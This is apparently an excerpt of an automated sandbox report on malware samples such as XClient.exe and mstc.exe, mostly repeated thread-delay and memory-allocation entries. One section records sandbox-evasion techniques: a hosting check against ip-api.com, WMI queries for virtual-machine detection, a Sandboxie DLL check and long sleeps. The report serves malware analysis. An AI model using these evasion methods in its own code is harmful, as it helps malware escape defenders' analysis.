Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\ProgramData\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: XClient.exe, 00000002.00000002.2585450577.0000000002961000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, XClient.exe, 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, mstc.exe.2.dr, XClient.exe.1.dr

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Output.exe	Memory allocated: 9A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Output.exe	Memory allocated: 1A420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\XClient.exe	Memory allocated: 1000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\XClient.exe	Memory allocated: 1A960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\build.exe	Memory allocated: 2470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\build.exe	Memory allocated: 2690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\build.exe	Memory allocated: 25E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Memory allocated: FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Memory allocated: 1AA50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Memory allocated: 770000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Memory allocated: 1A250000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Memory allocated: 1510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Memory allocated: 1B150000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599303	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599140	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599030	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598921	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598256	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597245	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596904	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596577	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596243	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595793	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595436	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595327	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\XClient.exe	Window / User API: threadDelayed 2035	Jump to behavior
Source: C:\ProgramData\XClient.exe	Window / User API: threadDelayed 7796	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5985	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3816	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8210	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1459	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8493
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1103
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7564
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1993

Source: C:\Users\user\Desktop\Output.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -599303s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -599140s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -599030s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -598921s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -598812s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -598256s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -597795s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -597245s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -596904s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -596577s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -596243s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -595793s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -595436s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -595327s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -595218s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -594671s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -594562s >= -30000s	Jump to behavior
Source: C:\ProgramData\XClient.exe TID: 3668	Thread sleep time: -594453s >= -30000s	Jump to behavior
Source: C:\ProgramData\build.exe TID: 7496	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep count: 8493 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep count: 1103 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4952	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep count: 7564 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep count: 1993 > 30
Source: C:\Users\user\AppData\Local\Temp\mstc.exe TID: 4436	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\mstc.exe TID: 5608	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\mstc.exe TID: 5736	Thread sleep time: -922337203685477s >= -30000s

Source: C:\ProgramData\XClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ProgramData\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\mstc.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Output.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599303	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599140	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 599030	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598921	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598256	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597245	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596904	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596577	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596243	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595793	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595436	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595327	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\ProgramData\XClient.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
